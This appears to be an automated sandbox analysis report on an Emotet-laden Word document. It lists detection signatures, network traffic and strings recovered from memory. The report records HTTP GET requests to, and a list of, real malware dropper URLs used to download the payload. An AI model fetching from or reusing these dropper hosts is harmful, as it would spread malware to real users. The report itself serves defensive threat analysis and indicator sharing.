Analysis Report N00048481397007.doc

Overview

General Information

Sample Name: N00048481397007.doc
Analysis ID: 344134
MD5: ad7db0f946bc5c3bb051cb04f359e6a4
SHA1: 24d54a6a1c4280b948fb245c97e4823d319eefe1
SHA256: 4fc6cbe4fae599ca6ab094dc1115909a687754f49a3ff31671ae4fbc7b3296d1

Most interesting Screenshot:

Detection

Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection:

barindex
Antivirus detection for URL or domain
Source: http://nightlifemumbai.club/x/0wBD3/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev/wp-includes/RlMObf2j0/ Avira URL Cloud: Label: malware
Source: https://jflmktg.wpcomstaging.com/wp-content/AK/ Avira URL Cloud: Label: malware
Source: https://shop.nowfal.dev Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: shop.nowfal.dev Virustotal: Detection: 7% Perma Link
Source: e-wdesign.eu Virustotal: Detection: 5% Perma Link
Multi AV Scanner detection for submitted file
Source: N00048481397007.doc Virustotal: Detection: 16% Perma Link

Compliance:

barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Binary contains paths to debug symbols
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2087459336.0000000002290000.00000002.00000001.sdmp
Source: Binary string: <ystem.pdb source: powershell.exe, 00000005.00000002.2087450324.0000000002277000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: nightlifemumbai.club
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.88.166:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.217.6.174:80

Networking:

barindex
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: Do you want to switch to it now?
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp String found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in memory: http://nightlifemumbai.club/x/0wBD3/!https://shop.nowfal.dev/wp-includes/RlMObf2j0/!http://e-wdesign.eu/wp-content/bn1IgDejh/!http://traumfrauen-ukraine.de/bin/JyeS/!https://jflmktg.wpcomstaging.com/wp-content/AK/!https://linhkienmaytinh.tctedu.com/wp-snapshots/VzJM/
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp String found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp String found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 212.227.200.73 212.227.200.73
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: AUTOMATTICUS AUTOMATTICUS
Source: Joe Sandbox View ASN Name: M247GB M247GB
Source: Joe Sandbox View ASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 104.21.88.166:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown HTTPS traffic detected: 212.227.200.73:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: unknown HTTPS traffic detected: 192.0.78.20:443 -> 192.168.2.22:49170 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F5018462-B174-499E-B3BD-E7523F18DF93}.tmp Jump to behavior
Source: global traffic HTTP traffic detected: GET /x/0wBD3/ HTTP/1.1Host: nightlifemumbai.clubConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-content/bn1IgDejh/ HTTP/1.1Host: e-wdesign.euConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /bin/JyeS/ HTTP/1.1Host: traumfrauen-ukraine.deConnection: Keep-Alive
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown DNS traffic detected: queries for: nightlifemumbai.club
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1569Date: Tue, 26 Jan 2021 05:54:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000005.00000002.2095948799.000000001D2B4000.00000004.00000001.sdmp String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/EncryptionEverywhereDVTLSCA-G1.crt0
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000005.00000003.2086123235.000000001D35B000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000005.00000002.2096173039.000000001D2EF000.00000004.00000001.sdmp String found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
Source: powershell.exe, 00000005.00000003.2086190391.000000001D2E4000.00000004.00000001.sdmp String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0L
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: powershell.exe, 00000005.00000002.2086940849.0000000000391000.00000004.00000020.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000005.00000002.2093133348.000000001B612000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2096359937.000000001D337000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: http://e-wdesign.eu/wp-content/bn1IgDejh/
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000005.00000002.2096060379.000000001D2D4000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000005.00000003.2086146851.000000001D30C000.00000004.00000001.sdmp String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000005.00000002.2093609433.000000001CED0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091212034.0000000001B40000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088276083.0000000001C10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091319126.0000000001C10000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000005.00000002.2095150164.000000001D0B7000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2091516076.0000000001D27000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2088429744.0000000001DF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2091550716.0000000001DF7000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club
Source: powershell.exe, 00000005.00000002.2091877463.0000000003A85000.00000004.00000001.sdmp String found in binary or memory: http://nightlifemumbai.club/x/0wBD3/
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000005.00000002.2093071337.000000001B590000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.2093152588.000000001B62E000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0J
Source: powershell.exe, 00000005.00000002.2093234817.000000001B647000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000005.00000003.2086513222.000000001B657000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000005.00000003.2086200041.000000001D303000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000005.00000002.2092219813.0000000003BC1000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.sectigo.com0/
Source: powershell.exe, 00000005.00000003.2086210484.000000001D2F7000.00000004.00000001.sdmp String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
